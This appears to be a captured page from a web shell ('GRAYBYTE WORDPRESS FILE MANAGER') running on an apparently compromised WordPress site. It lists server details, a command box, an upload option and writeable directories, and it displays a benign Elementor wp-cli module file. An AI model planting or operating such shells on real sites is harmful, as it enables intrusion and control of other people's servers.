GRAYBYTE WORDPRESS FILE MANAGER6209

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/trustyourlawyer.com/wp-content/plugins/elementor/modules/wp-cli/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/trustyourlawyer.com/wp-content/plugins/elementor/modules/wp-cli//module.php
<?php
namespace Elementor\Modules\WpCli;

use Elementor\Core\Base\Module as BaseModule;
use Elementor\Core\Logger\Manager as Logger;
use Elementor\Plugin;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

class Module extends BaseModule {

	/**
	 * Get module name.
	 *
	 * @since 2.0.0
	 * @access public
	 *
	 * @return string Module name.
	 */
	public function get_name() {
		return 'wp-cli';
	}

	/**
	 * @since 2.1.0
	 * @access public
	 * @static
	 */
	public static function is_active() {
		return defined( 'WP_CLI' ) && WP_CLI;
	}

	/**
	 * @param Logger $logger
	 * @access public
	 */
	public function register_cli_logger( $logger ) {
		$logger->register_logger( 'cli', 'Elementor\Modules\WpCli\Cli_Logger' );
		$logger->set_default_logger( 'cli' );
	}

	public function init_common() {
		Plugin::$instance->init_common();
	}

	/**
	 *
	 * @since 2.1.0
	 * @access public
	 */
	public function __construct() {
		add_action( 'cli_init', [ $this, 'init_common' ] );
		add_action( 'elementor/loggers/register', [ $this, 'register_cli_logger' ] );

		\WP_CLI::add_command( 'elementor', '\Elementor\Modules\WpCli\Command' );
		\WP_CLI::add_command( 'elementor update', '\Elementor\Modules\WpCli\Update' );
		\WP_CLI::add_command( 'elementor library', '\Elementor\Modules\WpCli\Library' );
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:28
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:28
giriqfky / giriqfky
0644
cli-logger.php
0.585 KB
March 17 2025 17:28:54
giriqfky / giriqfky
0644
command.php
4.594 KB
March 17 2025 17:28:54
giriqfky / giriqfky
0644
library.php
6.809 KB
March 17 2025 17:28:54
giriqfky / giriqfky
0644
module.php
1.291 KB
March 17 2025 17:28:54
giriqfky / giriqfky
0644
update.php
2.544 KB
March 17 2025 17:28:54
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF